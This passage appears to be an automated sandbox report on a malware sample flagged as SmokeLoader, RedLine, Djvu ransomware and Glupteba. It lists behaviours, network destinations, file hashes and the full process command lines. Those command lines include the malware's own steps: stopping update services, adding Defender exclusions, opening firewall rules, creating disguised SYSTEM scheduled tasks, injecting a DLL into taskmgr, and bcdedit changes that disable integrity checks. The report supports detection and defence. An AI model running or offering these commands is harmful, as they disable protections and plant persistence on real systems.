Analysis Overview
SHA256
92e52d4a2fcf95b0dd487e49bacfac77ad241f4744f2c6edf670686553c3dec2
Threat Level: Known bad
The file 0x0006000000023234-4438.dat was found to be: Known bad.
Malicious Activity Summary
SmokeLoader
RedLine payload
Detected Djvu ransomware
Glupteba
Smokeloader family
Djvu Ransomware
RedLine
Glupteba payload
Modifies boot configuration data using bcdedit
Possible attempt to disable PatchGuard
Stops running service(s)
Downloads MZ/PE file
Modifies Windows Firewall
Deletes itself
Executes dropped EXE
Themida packer
Modifies file permissions
Checks computer location settings
Loads dropped DLL
Checks installed software on the system
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Analysis: static1
Detonation Overview
Reported
2023-12-11 10:55
Signatures
Smokeloader family
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-11 10:55
Reported
2023-12-11 10:57
Platform
win7-20231130-en
Max time kernel
30s
Max time network
105s
Signatures
Detected Djvu ransomware
Djvu Ransomware
RedLine
RedLine payload
SmokeLoader
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Stops running service(s)
Deletes itself
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Themida packer
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1388 wrote to memory of 2564 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1388 wrote to memory of 2564 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1388 wrote to memory of 2564 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
| PID 1388 wrote to memory of 2564 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\626B.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe
"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"
C:\Users\Admin\AppData\Local\Temp\626B.exe
C:\Users\Admin\AppData\Local\Temp\626B.exe
C:\Users\Admin\AppData\Local\Temp\F623.exe
C:\Users\Admin\AppData\Local\Temp\F623.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\is-8A7OE.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8A7OE.tmp\tuc3.tmp" /SL5="$B0118,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\FEEA.exe
C:\Users\Admin\AppData\Local\Temp\FEEA.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231211105617.log C:\Windows\Logs\CBS\CbsPersist_20231211105617.cab
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\5FFE.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\625F.bat" "
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\taskeng.exe
taskeng.exe {7F50F906-4264-4AA5-A52C-2A3365A7527B} S-1-5-18:NT AUTHORITY\System:Service:
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\88AD.exe
C:\Users\Admin\AppData\Local\Temp\88AD.exe
C:\Users\Admin\AppData\Local\Temp\A801.exe
C:\Users\Admin\AppData\Local\Temp\A801.exe
C:\Users\Admin\AppData\Local\Temp\A801.exe
C:\Users\Admin\AppData\Local\Temp\A801.exe
C:\Users\Admin\AppData\Local\Temp\A801.exe
"C:\Users\Admin\AppData\Local\Temp\A801.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\0dc616c6-eb31-4468-86e7-ba6f386b92f4" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\A801.exe
"C:\Users\Admin\AppData\Local\Temp\A801.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\EA4F.exe
C:\Users\Admin\AppData\Local\Temp\EA4F.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\EA4F.exe
C:\Users\Admin\AppData\Local\Temp\EA4F.exe
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Users\Admin\AppData\Local\Temp\338D.exe
C:\Users\Admin\AppData\Local\Temp\338D.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
Network
| Country | Destination | Domain | Proto |
| RU | 81.19.131.34:80 | 81.19.131.34 | tcp |
| RU | 185.172.128.19:80 | 185.172.128.19 | tcp |
| RU | 77.105.132.87:6731 | | tcp |
| RU | 77.105.132.87:6731 | | tcp |
| MD | 176.123.7.190:32927 | | tcp |
| US | 20.150.70.36:443 | | tcp |
| RU | 77.105.132.87:6731 | | tcp |
| RU | 212.193.52.24:80 | | tcp |
| RU | 212.193.52.24:80 | | tcp |
| RU | 212.193.52.24:80 | host-host-file8.com | tcp |
| RU | 212.193.52.24:80 | host-host-file8.com | tcp |
| US | 8.8.8.8:53 | edarululoom.com | udp |
| US | 172.67.167.33:443 | edarululoom.com | tcp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| MX | 187.211.38.89:80 | | tcp |
Files
memory/1388-147-0x0000000003DB0000-0x0000000003DC6000-memory.dmp
memory/412-148-0x0000000000400000-0x0000000000409000-memory.dmp
memory/784-152-0x00000000026A0000-0x0000000002A98000-memory.dmp
memory/3024-153-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2928-155-0x0000000074EA0000-0x000000007558E000-memory.dmp
memory/784-154-0x00000000026A0000-0x0000000002A98000-memory.dmp
memory/2928-158-0x0000000007180000-0x00000000071C0000-memory.dmp
memory/784-157-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 531f22cd609e10d0cd70c02710301b1b |
| SHA1 | 619efdc574cc3ca59fc105f77006e33b16de9fad |
| SHA256 | 8c20a11107a8d017219f77436e43ea221de57c0dadbd696876f015f4027c7a59 |
| SHA512 | 4b3ba4779d76baa6b17df8d3f0b99c1bbac62e4d651fbbe3da8b45dae2333fde94555c3e969cbfff65acc32833d1e2a3332f9aea1d21b1637668b93a8823ad00 |
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 9da6eef03d260d21db83a7466b06e23b |
| SHA1 | 6dc02699b091edea1d7857c449b067eb188fe9cf |
| SHA256 | ea24982baedc8d7b233271da4197fd0a27ad86cfc367a15f79f9d758eb5f96f0 |
| SHA512 | 9055001fc9da4d073af443887d6381445ab93e79f58913a6f94f96f494b5ff9aacb7811c934cf203aafc58bc48707de7b695b35d61f0d3d71048189de65e553b |
memory/2900-170-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | bda3dfed5834c5fbc7763f80fccfbe86 |
| SHA1 | 9c9ecb4ba8ef684c645b574357f35f82ef156b15 |
| SHA256 | 21971883424f86f5b97311df325fa22d449acd8a3c26eb4bb6c0243d30cfc500 |
| SHA512 | d77d15b7fc29cea83e093d622712baf7f9a2c0c12b6053b3371ff95259592e610feddbe720ce42814ec62a02bfb5a5b8bc6a88b4e2290ce4275c33adef4831e8 |
memory/2900-178-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 6fc87d13123b53e65c010338b912fdee |
| SHA1 | 20c541f49fa2cb439db7bb4ff8e6a6c2d5d86b9e |
| SHA256 | 6f8ea268c0f6881ab7cfaaa7dd888441108cf5b80fcff18c9869eae61ed2af89 |
| SHA512 | 016babe3be66a179c8ed7437e5ee36f955514af0e348d87df8fd33d5008c6412b99bd69845d38659fbff9a8ee7715e6ac6dde8727067220250d263a7e77c1b01 |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 8c9faa17b915bdebd4c8bb8f0f77c6ec |
| SHA1 | c76daa3387ca0628973ac37b56dba7c260432e63 |
| SHA256 | 25c8755fd3c35cac8c7ac3c87fbe33a010f960c7d12e47b1db046d359181228a |
| SHA512 | 469529de30c6fe908476a5845a60e03492f9a0390c33127d5e871182b1c635928493ffc1565def8cccc8b140a0dea32f63e88e080311f92a42be6159d4c075be |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | cbf898fc0c12e5e3968fc9c4267e668f |
| SHA1 | c4d1de3bd327243298a971b3da35c971a55fdbc0 |
| SHA256 | 422f7eda3ff7a9da3b5bb3e461683a82ffa0127fa911804b14f167c5333b1fa4 |
| SHA512 | d3e2b7e2b6950b50da69ff8db49c14ba9eab35067927f9711b3cc2d27e399c2dfadc6a5fc1c803631d3bf6d5b5c414286344fdd4c63df917baba0cd94a010f89 |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | c978d08ac1923bab079ae6110c62bd7f |
| SHA1 | b6e4fd3e020c85fec2f3992a131bed44232041ba |
| SHA256 | cccad339d4a1feff2cf148d0450ea2a2142cf2676e4f003f36b1aa9e98955ba7 |
| SHA512 | bfb7423594dd3837af4c519c6f3109333b4d4511768444b56870d97becf77e318826cf2889688f18c469bd56859bf163e7000f4c02ff2885adf2289ba2f5e4b7 |
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | d548a8b80f2883cf65dd5a01ce22e126 |
| SHA1 | a79880cc784cafecfe6d239a3b3e4243144de81c |
| SHA256 | e2a560508f018f67da107174f5d9819a12cfb2600bade9a6df354a59044bff28 |
| SHA512 | 1c9ddcd7c44beee96274e274935db0f853359b47f56320c44b9c1a495b90d8b5d4ea6091d89257863b94eada6d3c9323d5445d1ec557b09d67158d546b765871 |
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | c46f53bf9cd28f9aeabc8e4a6aace6e6 |
| SHA1 | fe4165a2624e10cdd17e0d05f218ef3f72075ed0 |
| SHA256 | 8bfb043a24015a94db47edf61f035482610783af4520b39337eebb3ae6a80694 |
| SHA512 | 1ef45307d70ba1255f654995cce4fb994f394cc1299b3ffc472232b4274e7875ce66b3d1f2061cb248105534e35d1ccd833e9da7a6a81d44637988de169ef032 |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | ad343a58da929811577f052a2aa152fc |
| SHA1 | 56a65433a2b6b6eb1c9c63c4392a67cebf90b8cc |
| SHA256 | 87b016241605b01899be2c96d3dbccaf38ac3ada1e067275cb94cd43c23fa531 |
| SHA512 | 83d5b6450bf85dd24f2f5e41478ceb6f0daa76f0afef446eae79f34e7e06b939d4cee8d303bd28d752af08a4cae3dddb00fd293841447966f18f5f985028f2d3 |
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | 0ff312913384822d7b060ef1951e4400 |
| SHA1 | b9026f38c0989f2376eaab26d85ee38d5e4583b2 |
| SHA256 | 3cc40c9008d75524912690bd620bd841dbbd420f0e67babf2c8691ce09a21a48 |
| SHA512 | e7d58958614b7656fd5aeaed8695c37328531d0c30358cb1e3d8bb4def3d7023d158341fd337e903464f34816844646678a3737a545dbf2e0ce74386304abdf3 |
memory/3024-198-0x0000000000400000-0x0000000000965000-memory.dmp
memory/1784-200-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/3008-199-0x000000013F320000-0x000000013F8C1000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | d71dff97ca86ca16c3db8bdb5285fb35 |
| SHA1 | 271c01246897497d069b81ed37af296cf6c1e498 |
| SHA256 | 4a19255504acfbd49c4e1aed722c7e62b50b5742b860eedabc5f46160f8aefac |
| SHA512 | 1fed2a183296b563e35d803927e539d28169895f6ca5b522a1c714f222a2d3e578b1e167b19568b5ad4800b898f7ac041c7bd8f6bb02d1361b32cbdcfb0f682a |
C:\Users\Admin\AppData\Local\Temp\Tar31A0.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
memory/784-241-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/784-246-0x00000000026A0000-0x0000000002A98000-memory.dmp
memory/784-250-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5FFE.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
memory/1224-278-0x0000000001DB0000-0x0000000001DB8000-memory.dmp
memory/1224-277-0x000000001B3D0000-0x000000001B6B2000-memory.dmp
memory/1224-280-0x0000000002980000-0x0000000002A00000-memory.dmp
memory/1224-282-0x0000000002984000-0x0000000002987000-memory.dmp
memory/1224-285-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TC60ZO5QB7DZZBDANICX.temp
| MD5 | 4b42a5243f1820b1e530c2ae736a8cb4 |
| SHA1 | 36653189ba3a1e24ad5449c118f810dd7a3b3e4b |
| SHA256 | d34a113b1f03880b5a17fa92a39ecb506f5fb68ffbe8fc4c8da5af636d4758f8 |
| SHA512 | 05f77e564ca6b8239920bdb02bdcf02b52dd409a61f1ff2d2e61b48d9e8817468601953af72f7e9d05607da9e892d394669b061de4999b7c4f1fb6f85b6c8eb2 |
memory/2244-293-0x000007FEF5560000-0x000007FEF5EFD000-memory.dmp
memory/3008-303-0x000000013F320000-0x000000013F8C1000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Note: these four digests are the well-known hashes of a zero-byte file. The updater.exe entry was created empty (or captured before anything was written to it), so its hashes identify nothing and must not be used as indicators; the path itself is still a valid artifact.
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | e966740f5ba6a3679f1dafd7ef109658 |
| SHA1 | 70a67b854793462ea66d80fd95c94be9ee4d3624 |
| SHA256 | 25997cf8c231c2a6f42d77f5c27d5a8b58775fa200ee5d15b910c0c07028a95f |
| SHA512 | 667e0bfc95af4fad81ca65c52c7cee1019e1d27a9ea2f4c9a904644f9da99e2ca673a4a3d165e509d1cbb64107d8a52e171b3423405f65229506bed17dd73fa0 |
memory/2244-300-0x000007FEF5560000-0x000007FEF5EFD000-memory.dmp
memory/2244-299-0x0000000002A90000-0x0000000002B10000-memory.dmp
memory/2244-298-0x0000000002A90000-0x0000000002B10000-memory.dmp
memory/2244-297-0x0000000002A90000-0x0000000002B10000-memory.dmp
memory/2244-296-0x000007FEF5560000-0x000007FEF5EFD000-memory.dmp
memory/2244-295-0x0000000002820000-0x0000000002828000-memory.dmp
memory/2244-294-0x0000000002A90000-0x0000000002B10000-memory.dmp
memory/2244-292-0x000000001B5A0000-0x000000001B882000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 30c8b181846a06b0c8827ff5019bcf64 |
| SHA1 | 810b3307e8bbe30ef8d1f915fbdf0d387acfe3d1 |
| SHA256 | 03af3947f2e318e664c776e6a12232d536ab9e5df3dd6ed242b412bf7ce505e3 |
| SHA512 | dcdeef6cd7d5c57abe4f5ad0fdb0adb34ea32b09c1f887550a70d05eb48718cc270b42c08884df0393fae38189fa57b253f5887c86fb7374d817cbad803fdd54 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 5da20b844c34cda2b83a71b13db09cc4 |
